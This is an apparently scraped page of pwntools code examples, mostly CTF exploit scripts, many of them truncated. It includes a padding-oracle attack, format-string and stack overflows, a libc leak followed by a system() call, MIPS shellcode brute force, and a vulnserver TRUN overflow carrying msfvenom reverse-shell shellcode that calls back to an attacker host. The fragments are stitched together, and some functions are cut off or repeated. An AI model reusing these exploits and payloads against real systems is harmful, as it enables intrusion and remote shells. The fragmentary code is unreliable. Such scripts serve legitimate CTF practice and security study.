        #    if somecookie[24:26] != '':
        #    raise BadPaddingException()
        #elif somecookie[:22] == "0000000000000000000000":
        #    if somecookie[22:24] != '':
        #    raise BadPaddingException()
        #elif somecookie[:20] == "00000000000000000000":
        #    if somecookie[20:22] != '':
        #    raise BadPaddingException()
        #elif somecookie[:18] == "000000000000000000":
        #    if somecookie[18:20] != '':
        #    raise BadPaddingException()
        #elif somecookie[:16] == "0000000000000000":
        #    if somecookie[16:18] != '':
        #    raise BadPaddingException()
        #elif somecookie[:14] == "00000000000000":
        #    if somecookie[14:16] != '':
        #    raise BadPaddingException()
        #elif somecookie[:12] == "000000000000":
        #    if somecookie[12:14] != '':
        #    raise BadPaddingException()
        #elif somecookie[:10] == "0000000000":
        #    if somecookie[10:12] != '':
        #    raise BadPaddingException()
        #elif somecookie[:8] == "00000000":
        #    if somecookie[8:10] != '':
        #    raise BadPaddingException()
        #elif somecookie[:6] == "000000":
        #    if somecookie[6:8] != '':
        #    raise BadPaddingException()
        #elif somecookie[:4] == "0000":
        #    if somecookie[4:6] != '':
        #    raise BadPaddingException()
        #elif somecookie[:2] == "00":
        #    if somecookie[2:4] != '':
        #    raise BadPaddingException()
        #elif somecookie[0:2] != '':
        #    raise BadPaddingException()

        # TODO manage the lack of connection (n-retries when no connection are possibles)
        sock = pwn.remote(HOST, PORT)
        sock.sendafter('What is your cookie?\n', somecookie + '\n')
        buf = sock.recvall()

        resp.write(somecookie)
        resp.write(buf)
        if 'File "/problems/magic-padding-oracle_4_b6a931ed628517746b8ea88c8688f148/pkcs7.py", line 20, in isvalidpad' in buf:
            raise Exception('Exception for this script')
        if 'invalid padding' in buf:
            raise BadPaddingException()
        pwn.log.info('No padding exception raised on %r', somecookie)
Esempio n. 38
0
from pwn import process, remote, p64

HOST = 'ctf-challs.sinf.pt'
PORT = 1339
#io = process("./coal_mine", level="debug")
io = remote(HOST, PORT, level='debug')

io.recvuntil("fellow miner?\n")
io.sendline("%15$p")
io.recvuntil("Thanks, ")

line = io.recvuntil("\n").strip()
value = int(line, 16)

value_str = "".join(chr(c) for c in p64(value))

io.recvuntil("mining today?")

injection = 'A' * 40 + value_str + 8 * 'A' + '\x84\x12\x40\x00\x00\x00\x00\x00'

io.sendline(injection)
io.interactive()
Esempio n. 39
0
# context.log_level = 'debug'
N = 16

def to_block(b):
    return '{:0{width}x}'.format(b, width=N*2).decode('hex')

def to_blocks(m):
    m += to_block(len(m))
    padb = N - len(m) % N
    m += chr(padb) * padb
    blocks = [m[N*i : N*(i+1)] for i in range(len(m) // N)]
    return blocks

# r = process('./macsh.py')
r = remote('macsh.chal.pwning.xxx', 64791)

def e(m, mac = '0'):
    global r
    r.sendlineafter('> ', mac+'<|>'+m)
    return r.recvline()


def test(cmd):
    global r

    echo = 'echo ' + '3' * (len(cmd)-5)
    p = 'tag ' + echo
    p1 = echo + '\x00' * (16-len(echo))
    p2 = cmd + '\x00' * (16-len(cmd))
Esempio n. 40
0
import pwn

io = pwn.remote("localhost", 9000)

if pwn.args.GDB:
    # breakpoints:
    # 0x4001d4: vuln.leave
    # 0x400138: after notvuln.write
    # 0x400165: after notvuln.read
    pwn.gdb.attach(
        target="chall",  # Takes the youngest PID matching this name
        exe="./chall",
        gdbscript="""
break *0x4001d4
break *0x400138
break *0x400165
continue
    """,
    )

pwn.context.binary = elf = pwn.ELF("chall")
stack_shadow = elf.symbols["__stack_shadow"]
print(hex(stack_shadow))
"""
Exploit:
- Overwrite $rbp to set address for an arbitrary write
  - The address we'll use is `__stack_shadow`
- Overwrite return address in `__stack_shadow` to control $rip
- Jump into shellcode also stored on .bss, which is RWX
"""
Esempio n. 41
0
def find_change(coins, value):
    coins = sorted(coins, reverse=True)
    coin_dict = {}
    for c in coins:
        if value % c == 0:
            coin_dict[c] = value / c
            return coin_dict
        else:
            coin_dict[c] = math.trunc(value/ float(c))
            value -= (c * coin_dict[c])

coins = [1, 5, 10, 25, 50, 100, 500, 1000, 2000, 5000, 10000, 50000, 100000, 500000, 1000000]

print ('Started')
r = pwn.remote("misc.chal.csaw.io", 8000)

iteration_count = 0
while True:
    iteration_count += 1
    print ('ROUND # %s'%(iteration_count))
    l1 = r.recvline(timeout=2)
    print(l1)

    amount = int(round(float(str(l1.rstrip()[1:])) * 100))
    print "Coins needed: " + str(amount)
    answer =  find_change(coins, amount)

    for coin in sorted(coins, reverse=True):
        l2 = r.recvuntil(':', timeout=2)
        print(l2)
Esempio n. 42
0
def benign(ip, port):
    def rand_str():
        return ''.join(random.choice(string.ascii_letters) for i in range(30))

    pwn.context(timeout=10)
    word_cnt = random.randrange(3, 10)
    words = []
    for i in range(word_cnt):
        words.append([rand_str(), rand_str(), rand_str()])
    dict_id1 = rand_str()
    pwd1 = rand_str()
    dict_id2 = rand_str()
    pwd2 = rand_str()
    str_to_translate = " ".join([x[0] for x in words])
    str_after_translate_1 = " ".join([x[1] for x in words])
    str_after_translate_2 = " ".join([x[2] for x in words])
    str_without_translate = str_to_translate

    r = pwn.remote(ip, port)
    if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
        raise RuntimeError("Wrong banner")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_without_translate:
        raise RuntimeError("Wrong default translation")
    r.send("dict {}\n".format(dict_id1))
    info = r.recvline()
    m = re.match(
        "Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
        info)
    if not m:
        raise RuntimeError("Wrong password request")
    byte = int(m.group(1), 16)
    r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n')
    if not r.recvline() == "Dictionary created\n":
        raise RuntimeError("Can't create dictionary 1")
    for (word_from, word_to1, word_to2) in words:
        r.send("add {} {}\n".format(word_from, word_to1))
        if not r.recvline() == "Word saved!\n":
            raise RuntimeError("Can't store word")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_after_translate_1:
        raise RuntimeError("Wrong translation after adding words")

    r.send("dict {}\n".format(dict_id2))
    info = r.recvline()
    m = re.match(
        "Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
        info)
    if not m:
        raise RuntimeError("Wrong password request")
    byte = int(m.group(1), 16)
    r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
    if not r.recvline() == "Dictionary created\n":
        raise RuntimeError("Can't create dictionary 2")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_without_translate:
        raise RuntimeError("Wrong translation after switching dictionaries")
    for (word_from, word_to1, word_to2) in words:
        r.send("add {} {}\n".format(word_from, word_to2))
        if not r.recvline() == "Word saved!\n":
            raise RuntimeError("Can't store word")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_after_translate_2:
        raise RuntimeError(
            "Wrong translation after adding words to another dictionary")

    r.send("quit\n")
    if not r.recvall() == "Good bye!\n":
        raise RuntimeError("Wrong goodbye")

    r = pwn.remote(ip, port)
    if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
        raise RuntimeError("Wrong banner")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_without_translate:
        raise RuntimeError(
            "Wrong default translation after words added to another dictionary"
        )
    r.send("dict {}\n".format(dict_id1))
    info = r.recvline()
    m = re.match(
        "Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
        info)
    if not m:
        raise RuntimeError("Wrong password request")
    byte = int(m.group(1), 16)
    r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
    if not r.recvline() == "Dictionary exists and password doesn't match\n":
        raise RuntimeError("Wrong message after wrong password")
    if not r.recvline() == "Dictionary not loaded\n":
        raise RuntimeError("Wrong message after wrong password")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_without_translate:
        raise RuntimeError("Wrong translation after wrong password attempt")

    r.send("dict {}\n".format(dict_id1))
    info = r.recvline()
    m = re.match(
        "Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
        info)
    if not m:
        raise RuntimeError("Wrong password request")
    byte = int(m.group(1), 16)
    r.send(pwd1 + 'XXX\n')
    if not r.recvline() == 'Please input only hexadecimal characters\n':
        raise RuntimeError("Wrong message after invalid password")
    if not r.recvline() == "Dictionary not loaded\n":
        raise RuntimeError("Wrong message after invalid password")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_without_translate:
        raise RuntimeError("Wrong translation after invalid password attempt")

    r.send("dict {}\n".format(dict_id1))
    info = r.recvline()
    m = re.match(
        "Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
        info)
    if not m:
        raise RuntimeError("Wrong password request")
    byte = int(m.group(1), 16)
    r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n')
    if not r.recvline() == 'Password ok!\n':
        raise RuntimeError("Can't load dictionary")
    if not r.recvline() == 'Dictionary loaded\n':
        raise RuntimeError("Can't load dictionary")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_after_translate_1:
        raise RuntimeError("Wrong translation after loading stored dictionary")

    r.send("dict {}\n".format(dict_id2))
    info = r.recvline()
    m = re.match(
        "Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
        info)
    if not m:
        raise RuntimeError("Wrong password request")
    byte = int(m.group(1), 16)
    r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
    if not r.recvline() == 'Password ok!\n':
        raise RuntimeError("Can't load dictionary")
    if not r.recvline() == 'Dictionary loaded\n':
        raise RuntimeError("Can't load dictionary")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_after_translate_2:
        raise RuntimeError("Wrong translation after loading stored dictionary")

    r.send("quit\n")
    if not r.recvall() == "Good bye!\n":
        raise RuntimeError("Wrong goodbye")
Esempio n. 43
0
import pwn
import struct
import time
import subprocess
import re

LOCAL = False

if LOCAL:
    sh = pwn.process('hive')
else:
    sh = pwn.remote('104.196.102.240', 5000)

def get_timestamp_hash (timestamp) :
    proc = subprocess.Popen('./hive_patched', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
    stdout, stderr = proc.communicate(struct.pack('<L', timestamp))
    return stdout[-33:]

def login(sh):
    initial = sh.recv(1024)
    timestr = re.findall('time is: (.*?),', initial)[0]
    print '[+] timestr', timestr
    timehash = get_timestamp_hash(int(timestr))
    print '[+] timehash', timehash

    sh.sendline('username')
    sh.sendline('5up3rm@n')
    sh.sendline(timehash)

def build_rop():
    pack = struct.pack    
Esempio n. 44
0
#!/usr/bin/env python3
from pwn import remote
import os

RHOST = "192.168.0.108"
RPORT = 9999
socket = remote(RHOST,RPORT)

# ./yz-patterns.py -p bruijn -l 4000 -a 123456789
pattern = b"1111211131114111511161117111811191122112311241125112611271128112911321133113411351136113711381139114211431144114511461147114811491152115311541155115611571158115911621163116411651166116711681169117211731174117511761177117811791182118311841185118611871188118911921193119411951196119711981199121213121412151216121712181219122212231224122512261227122812291232123312341235123612371238123912421243124412451246124712481249125212531254125512561257125812591262126312641265126612671268126912721273127412751276127712781279128212831284128512861287128812891292129312941295129612971298129913131413151316131713181319132213231324132513261327132813291332133313341335133613371338133913421343134413451346134713481349135213531354135513561357135813591362136313641365136613671368136913721373137413751376137713781379138213831384138513861387138813891392139313941395139613971398139914141514161417141814191422142314241425142614271428142914321433143414351436143714381439144214431444144514461447144814491452145314541455145614571458145914621463146414651466146714681469147214731474147514761477147814791482148314841485148614871488148914921493149414951496149714981499151516151715181519152215231524152515261527152815291532153315341535153615371538153915421543154415451546154715481549155215531554155515561557155815591562156315641565156615671568156915721573157415751576157715781579158215831584158515861587158815891592159315941595159615971598159916161716181619162216231624162516261627162816291632163316341635163616371638163916421643164416451646164716481649165216531654165516561657165816591662166316641665166616671668166916721673167416751676167716781679168216831684168516861687168816891692169316941695169616971698169917171817191722172317241725172617271728172917321733173417351736173717381739174217431744174517461747174817491752175317541755175617571758175917621763176417651766176717681769177217731774177517761777177817791782178317841785178617871788178917921793179417951796179717981799181819182218231824182518261827182818291832183318341835183618371838183918421843184418451846184718481849185218531854185518561857185818591862186318641865186618671868186918721873187418751876187718781879188218831884188518861887188818891892189318941895189618971898189919192219231924192519261927192819291932193319341935193619371938193919421943194419451946194719481949195219531954195519561957195819591962196319641965196619671968196919721973197419751976197719781979198219831984198519861987198819891992199319941995199619971998199922223222422252226222722282229223322342235223622372238223922432244224522462247224822492253225422552256225722582259226322642265226622672268226922732274227522762277227822792283228422852286228722882289229322942295229622972298229923232423252326232723282329233323342335233623372338233923432344234523462347234823492353235423552356235723582359236323642365236623672368236923732374237523762377237823792383238423852386238723882389239323942395239623972398239924242524262427242824292433243424352436243724382439244324442445244624472448244924532454245524562457245824592463246424652466246724682469247324742475247624772478247924832484248524862487248824892493249424952496249724982499252526252725282529253325342535253625372538253925432544254525462547254825492553255425552556255725582559256325642565256625672568256925732574257525762577257825792583258425852586258725882589259325942595259625972598259926262726282629263326342635263626372638263926432644264526462647264826492653265426552656265726582659266326642665266626672668266926732674267526762677267826792683268426852686268726882689269326942695269626972698269927272827292733273427352736273727382739274327442745274627472748274927532754275527562757275827592763276427652766276727682769277327742775277627772778277927832784278527862787278827892793279427952796279727982799282829283328342835283628372838283928432844284528462847284828492853285428552856285728582859286328642865286628672868286928732874287528762877287828792883288428852886288728882889289328942895289628972898289929293329342935293629372938293929432944"
# always check bad chars !!!
badchars = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.107 LPORT=8990 EXITFUNC=thread -a x86 -f c -b "\x00"
rev_shell2 = b"\xba\x33\x40\xe5\x4b\xda\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1\x52\x83\xe8\xfc\x31\x50\x0e\x03\x63\x4e\x07\xbe\x7f\xa6\x45\x41\x7f\x37\x2a\xcb\x9a\x06\x6a\xaf\xef\x39\x5a\xbb\xbd\xb5\x11\xe9\x55\x4d\x57\x26\x5a\xe6\xd2\x10\x55\xf7\x4f\x60\xf4\x7b\x92\xb5\xd6\x42\x5d\xc8\x17\x82\x80\x21\x45\x5b\xce\x94\x79\xe8\x9a\x24\xf2\xa2\x0b\x2d\xe7\x73\x2d\x1c\xb6\x08\x74\xbe\x39\xdc\x0c\xf7\x21\x01\x28\x41\xda\xf1\xc6\x50\x0a\xc8\x27\xfe\x73\xe4\xd5\xfe\xb4\xc3\x05\x75\xcc\x37\xbb\x8e\x0b\x45\x67\x1a\x8f\xed\xec\xbc\x6b\x0f\x20\x5a\xf8\x03\x8d\x28\xa6\x07\x10\xfc\xdd\x3c\x99\x03\x31\xb5\xd9\x27\x95\x9d\xba\x46\x8c\x7b\x6c\x76\xce\x23\xd1\xd2\x85\xce\x06\x6f\xc4\x86\xeb\x42\xf6\x56\x64\xd4\x85\x64\x2b\x4e\x01\xc5\xa4\x48\xd6\x2a\x9f\x2d\x48\xd5\x20\x4e\x41\x12\x74\x1e\xf9\xb3\xf5\xf5\xf9\x3c\x20\x59\xa9\x92\x9b\x1a\x19\x53\x4c\xf3\x73\x5c\xb3\xe3\x7c\xb6\xdc\x8e\x87\x51\x23\xe6\x87\xca\xcb\xf5\x87\x2f\x12\x73\x61\x45\x3a\xd5\x3a\xf2\xa3\x7c\xb0\x63\x2b\xab\xbd\xa4\xa7\x58\x42\x6a\x40\x14\x50\x1b\xa0\x63\x0a\x8a\xbf\x59\x22\x50\x2d\x06\xb2\x1f\x4e\x91\xe5\x48\xa0\xe8\x63\x65\x9b\x42\x91\x74\x7d\xac\x11\xa3\xbe\x33\x98\x26\xfa\x17\x8a\xfe\x03\x1c\xfe\xae\x55\xca\xa8\x08\x0c\xbc\x02\xc3\xe3\x16\xc2\x92\xcf\xa8\x94\x9a\x05\x5f\x78\x2a\xf0\x26\x87\x83\x94\xae\xf0\xf9\x04\x50\x2b\xba\x25\xb3\xf9\xb7\xcd\x6a\x68\x7a\x90\x8c\x47\xb9\xad\x0e\x6d\x42\x4a\x0e\x04\x47\x16\x88\xf5\x35\x07\x7d\xf9\xea\x28\x54"

payload = b""
payload += b"TRUN /.:/"
payload += pattern[:2003]
payload += b"\xaf\x11\x50\x62"#625011AF
payload += b"\x90"*32
payload += rev_shell2

print("[-] Sending buffer with a length of: " + str(len(payload)))
socket.send(payload)
print("[+] Buffer sent.")
socket.close()

Esempio n. 45
0
 def __init__(self, host, port):        
     print colored('>> Happy pwning !', 'cyan')
     self.conn = pwn.remote(host, port)
Esempio n. 46
0
import pwn

# conn = pwn.process('./vuln')
conn = pwn.remote('docker.hackthebox.eu', 30638)
print(conn.recvline())
ss = 'a' * (0x9b1c - 0x9a60)
ss += pwn.p32(0x080491e2)  # flag函数地址,这个地址因为栈溢出而被修改
ss += pwn.p32(0x08049313)  # vuln函数地址
ss += pwn.p32(0xdeadbeef)  # 在flag函数中会对比[ebp+0x8]
ss += pwn.p32(0xc0ded00d)  # 在flag函数中会对比[ebp+0xc]
conn.sendline(ss)
print(conn.recv())
print(conn.recv())
conn.sendline('123')
conn.recvline()
Esempio n. 47
0
File: aui.py Progetto: galakt/RT_CTF
import pwn
import base64
import os

print "Started!"
r = pwn.remote("pwn.chal.csaw.io", 8001)
print(r.recvline())

print(r.recvline())
print(r.recvline())
print(r.recvline())
print(r.recvline())
print(r.recvline())
print(r.recvline())
print(r.recvline())
print(r.recvline())


print('GETTING HELP')
r.sendline('help')
print(r.recvline())
print('RECV HELP')
l2 = r.recvuntil(', \'exit\', or \'help\'.', timeout=2)
print(l2)

print('CREATING FILE')
f = open('/root/Desktop/github/RT_CTF/csaw/aui', 'wb')
f.write(l2)
f.close()
Esempio n. 48
0
 def init(args):
     p = remote(args.host, 8888, level='error')
     return p
Esempio n. 49
0
def connect():
    if LOCAL:
        return pwn.remote('127.0.0.1', 1337)
    else:
        return pwn.remote('0db14e.hack.dat.kiwi', 1337)
Esempio n. 50
0
#!/usr/bin/env python

import pwn
import re

host, port = '2018shell2.picoctf.com', 15853

s = pwn.remote(host, port)

prompt = s.recv()

print prompt

binary = re.findall('the (.*) as a word', prompt)[0]
answer = hex(int(binary.replace(' ', ''),2))[2:].decode('hex')

s.sendline(answer)

prompt = s.recv()

print prompt
hexadecimal = re.findall('the (.*) as a word', prompt)[0]

print hexadecimal.decode('hex')

s.sendline(answer)

prompt = s.recv()

print prompt
octal = re.findall('the (.*) as a word', prompt)[0]
 def connect(self, ip, port_no):
     self.conn = pwn.remote(ip, port_no)
Esempio n. 52
0
def leak(addr):
    global stack_addr
    func_addr = 0x080498a6
    index = (stack_addr + 0x20 - command) // 4
    payload = str(index).ljust(0x10, 'A').encode()
    payload += pwn.p32(func_addr) + pwn.p32(0x0)
    payload += pwn.p32(elf.plt[b'write']) + pwn.p32(elf.sym[b'main'])
    payload += pwn.p32(1) + pwn.p32(addr) + pwn.p32(0x4)
    stack_addr -= 0xf0
    io.recvuntil('> ')
    io.sendline(payload)
    return io.recv(4)


command = 0x08058154

io = pwn.remote('chall.pwnable.tw', 10202)

stack_addr = leak_stack()

dynelf = pwn.DynELF(leak, elf=elf)
system_addr = dynelf.lookup(b'system', b'libc')

index = (stack_addr + 0x60 - command) // 4
payload = (str(index).encode() + b';/bin/cat /home/starbound/flag\x00').ljust(
    0x50, b'A') + pwn.p32(system_addr)
io.recvuntil('> ')
io.sendline(payload)

io.interactive()
Esempio n. 53
0
import time, pwn, os, struct

local = False
if local:
    s = pwn.remote("localhost", 2323)
    os.system("echo nye; pgrep messenger; echo bye")
    raw_input("> ")
else:
    s = pwn.remote("110.10.212.137", 3333)

print s.recvuntil(">> ")
def allocate_note(s, size, msg):
    s.send("L\n")
    print s.recv(1024)
    s.send("{}\n".format(size))
    print s.recv(1024)
    s.send("{}\n".format(msg))
    print s.recvuntil(">> ")

def change_note(s, index, size, msg):
    s.send("C\n")
    print s.recv(1024)
    s.send("{}\n".format(index))
    print s.recv(1024)
    s.send("{}\n".format(size))
    print s.recv(1024)
    s.send("{}\n".format(msg))
    print s.recvuntil(">> ")

def remove_note(s, index):
    s.send("R\n")
Esempio n. 54
0
#!/usr/bin/python3
import pwn

HOST, PORT = 'pwn2.ctf.nullcon.net', 5002
DEBUG = False

libc = pwn.ELF('./libc-2.23.so')

if DEBUG:
    env = {'LD_PRELOAD': './libc-2.23.so'}
    p = pwn.process(['./ld-2.23.so', './challenge'], env=env)
else:
    p = pwn.remote(HOST, PORT)
pwn.context.log_level = 'debug'


def Menu(i):
    p.recvuntil('5) Checkout!\n')
    if exploit:
        p.sendline('0' * (i - 1))
        p.recvline()
    else:
        p.sendline(str(i))


def Malloc(name):
    assert len(name) <= 0xF8

    Menu(1)

    p.recvuntil('Name of the book?\n')
Esempio n. 55
0
#!/usr/bin/env python3
import pwn
import sys

pwn.context.endian = 'big'
SHELL_CODE = b'\x28\x06\xff\xff\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xf4\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf8\xaf\xa0\xff\xfc\x27\xa4\xff\xf4\x28\x05\xff\xff\x24\x02\x0f\xab\x00\x00\x00\x0c'

for i in range(4092, 0, -4):
    p = pwn.remote('host', 12345)
    print(p.recvuntil(b'name:'))
    payload = b'a' * 20
    payload += pwn.p32(0x7ffff000 + i)
    payload += SHELL_CODE
    p.sendline(payload)
    p.sendline(b'echo test_shell')
    r = p.recvline()
    if b'test_shell' in r:
        p.sendline(b'cat .passwd')
        print(p.recvline())
        p.close()
        break
    else:
        p.close()
Esempio n. 56
0
File: cvv.py Progetto: galakt/RT_CTF
def solve():
    r = pwn.remote('misc.chal.csaw.io', 8308)
    generator = random.Random()
    generator.seed()  # Seed from current time
    while True:
        l = r.recvline().strip('\n')
        print(l)
        if(l == 'I need a new Visa!'):
            r.writeline(cg.credit_card_number(generator, cg.visaPrefixList, 16, 1)[0])
            continue
        if(l == 'I need a new Discover!'):
            r.writeline(cg.credit_card_number(generator, cg.discoverPrefixList, 16, 1)[0])
            continue
        if(l == 'I need a new MasterCard!'):
            r.writeline(cg.credit_card_number(generator, cg.mastercardPrefixList, 16, 1)[0])
            continue
        if(l == 'I need a new American Express!'):
            r.writeline(cg.credit_card_number(generator, cg.amexPrefixList, 15, 1)[0])
            continue
        if(l.startswith('I need a new card that starts with')):
            numberpart = l.replace('I need a new card that starts with ','').replace('!','')
            result = ''
            if(numberpart.startswith('2')
               or numberpart.startswith('3')
               or numberpart.startswith('4')
               or numberpart.startswith('5')
               or numberpart.startswith('7')
               or numberpart.startswith('8')
               or numberpart.startswith('9')):
                result = cg.completed_number(list(numberpart), 16)
            if(numberpart.startswith('6')
               or numberpart.startswith('1')):
                result = cg.completed_number(list(numberpart), 15)
            print('NumberPart = {}, result={}'.format(numberpart, result))
            r.writeline(result)
            continue
        if(l.startswith('I need a new card which ends with')):
            numberpart = l.replace('I need a new card which ends with ', '').replace('!', '')
            if(len(numberpart) == 1):
                cards = cg.credit_card_number(generator, cg.mastercardPrefixList, 16, 100)
                card = next((x for x in cards if x.endswith(numberpart)), None)
                print('NumberPart = {}, card={}'.format(numberpart, card))
                r.writeline(card)
                continue
            while True:
                part_without_last = numberpart[0:len(numberpart)-1]
                tcard = cg.completed_number_behind(list(part_without_last), 16)
                print('NumberPart = {}, card={}'.format(numberpart, tcard))
                if(tcard.startswith('0')):
                    continue
                if(tcard.endswith(numberpart)):
                    r.writeline(tcard)
                    break
            continue
        if(l.startswith('I need to know if')):
            numberpart = l.replace('I need to know if ', '').replace(' is valid! (0 = No, 1 = Yes)', '')
            print (numberpart)
            answer = is_valid(numberpart)
            print ('NumberPart = {}, is_valid = {}'.format(numberpart, answer))
            r.writeline(answer)
            continue
        if(l == 'Thanks!'):
            continue
        if(l == 'True'):
            continue
        if(l == 'False'):
            continue
        if(l == "Hmmmmm that doesn't seem correct..."):
            continue
        raise Exception('Unknown command')
Esempio n. 57
0
from utils.basics import hex_to_ascii
from utils.rsa.rsa_lsb_oracle import lsboracle
from pwn import remote

r = remote("challenges1.hexionteam.com", 5000)


def comm(msg: int) -> int:
    r.sendline(str(msg))
    return int(r.recvline().decode().strip().strip('>').strip())


def main():
    flag = int(r.recvline().decode().split(": ")[1].strip())

    assert r.recvline() == b'One encrypt:\n'

    r.recvuntil("m => ")
    r.sendline("-1")
    N = int(r.recvline()) + 1
    print("N:", N)
    assert r.recvline() == b'Alot of unhelpful decrypts:\n'

    dec = lsboracle(flag, comm, 65537, N)
    print(dec)
    print(hex_to_ascii(dec))


if __name__ == "__main__":
    main()
Esempio n. 58
0
def benign(ip, port):
    def rand_str():
        return ''.join(random.choice(string.ascii_letters) for i in range(30))
    pwn.context(timeout=10)
    word_cnt = random.randrange(3, 10)
    words = []
    for i in range(word_cnt):
        words.append([rand_str(), rand_str(), rand_str()])
    dict_id1 = rand_str()
    pwd1 = rand_str()
    dict_id2 = rand_str()
    pwd2 = rand_str()
    str_to_translate = " ".join([x[0] for x in words])
    str_after_translate_1 = " ".join([x[1] for x in words])
    str_after_translate_2 = " ".join([x[2] for x in words])
    str_without_translate = str_to_translate

    r = pwn.remote(ip, port)
    if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
        raise RuntimeError("Wrong banner")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_without_translate:
        raise RuntimeError("Wrong default translation")
    r.send("dict {}\n".format(dict_id1))
    info = r.recvline()
    m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
    if not m:
        raise RuntimeError("Wrong password request")
    byte = int(m.group(1), 16)
    r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n')
    if not r.recvline() == "Dictionary created\n":
        raise RuntimeError("Can't create dictionary 1")
    for (word_from, word_to1, word_to2) in words:
        r.send("add {} {}\n".format(word_from, word_to1))
        if not r.recvline() == "Word saved!\n":
            raise RuntimeError("Can't store word")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_after_translate_1:
        raise RuntimeError("Wrong translation after adding words")

    r.send("dict {}\n".format(dict_id2))
    info = r.recvline()
    m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
    if not m:
        raise RuntimeError("Wrong password request")
    byte = int(m.group(1), 16)
    r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
    if not r.recvline() == "Dictionary created\n":
        raise RuntimeError("Can't create dictionary 2")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_without_translate:
        raise RuntimeError("Wrong translation after switching dictionaries")
    for (word_from, word_to1, word_to2) in words:
        r.send("add {} {}\n".format(word_from, word_to2))
        if not r.recvline() == "Word saved!\n":
            raise RuntimeError("Can't store word")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_after_translate_2:
        raise RuntimeError("Wrong translation after adding words to another dictionary")

    r.send("quit\n")
    if not r.recvall() == "Good bye!\n":
        raise RuntimeError("Wrong goodbye")


    r = pwn.remote(ip, port)
    if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
        raise RuntimeError("Wrong banner")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_without_translate:
        raise RuntimeError("Wrong default translation after words added to another dictionary")
    r.send("dict {}\n".format(dict_id1))
    info = r.recvline()
    m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
    if not m:
        raise RuntimeError("Wrong password request")
    byte = int(m.group(1), 16)
    r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
    if not r.recvline() == "Dictionary exists and password doesn't match\n":
        raise RuntimeError("Wrong message after wrong password")
    if not r.recvline() == "Dictionary not loaded\n":
        raise RuntimeError("Wrong message after wrong password")
    r.send("translate {}\n".format(str_to_translate))
